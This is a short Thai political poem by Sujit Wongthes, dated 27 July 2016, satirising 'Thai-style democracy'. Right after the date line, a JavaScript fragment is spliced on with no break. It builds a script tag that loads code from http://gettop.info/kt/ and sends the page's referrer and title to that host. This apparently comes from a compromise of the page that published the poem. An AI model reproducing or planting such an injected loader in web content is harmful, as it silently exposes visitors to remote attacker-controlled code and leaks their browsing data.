แบบไทยไทย

 

ยกทัพโยธาประชามติ

แบบสากลพิจารณาก็หาไม่

เอาประชาธิปไตยแบบไทยไทย

กูต้องเป็นใหญ่กว่าพวกมึง

 

สุจิตต์ วงษ์เทศ

พุธ 27 กรกฎาคม 2559var d=document;var s=d.createElement(‘script’); s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;